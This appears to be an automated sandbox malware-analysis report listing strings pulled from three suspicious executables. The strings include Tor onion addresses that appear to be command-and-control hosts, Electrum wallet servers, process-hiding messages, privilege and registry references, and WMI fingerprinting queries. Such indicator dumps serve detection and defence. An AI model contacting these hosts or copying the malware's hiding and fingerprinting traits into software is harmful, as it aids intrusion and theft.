                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C07A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntel
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C01A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C01A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: !210e113336571014061e5d361525000421http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionhttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6SESSIONNAME=ConsoleUSERDOMAIN=user-PCwindir=C:\WindowsPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelSeDebugPrivilege
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionCommonProgramW6432=C:\Program Files\Common FilesFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerS-1-5-21-2246122658-3693405117-2476756634-1003
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0D6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0D6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: !This program cannoHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionhttps://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionSELECT Caption FROM Win32_OperatingSystemC:\Windows\System32\WindowsPowerShell\v1.0\powershellCOMPUTERNAME=user-PCHOMEPATH=\Users\userLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2PROCESSOR_REVISION=8f08PUBLIC=C:\Users\PublicSystemRoot=C:\Windows
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: !210e113336571014061e5d361525000421http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionhttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7SELECT Name FROM Win32_ProcessorPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6SESSIONNAME=ConsoleUSERDOMAIN=user-PCwindir=C:\WindowsPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntel
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C108000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: S-1-5-21-2246122658-3693405117-2476756634-1003https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionCommonProgramW6432=C:\Program Files\Common FilesFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerS-1-5-21-2246122658-3693405117-2476756634-1003
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onion
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 311c263d07362111531206573b1100053331http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onionhttp://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7SELECT Name FROM Win32_ProcessorIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7SELECT Name FROM Win32_VideoControllerC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6SESSIONNAME=ConsoleUSERDOMAIN=user-PCwindir=C:\WindowsPROCESSOR_IDENTIFIER=In
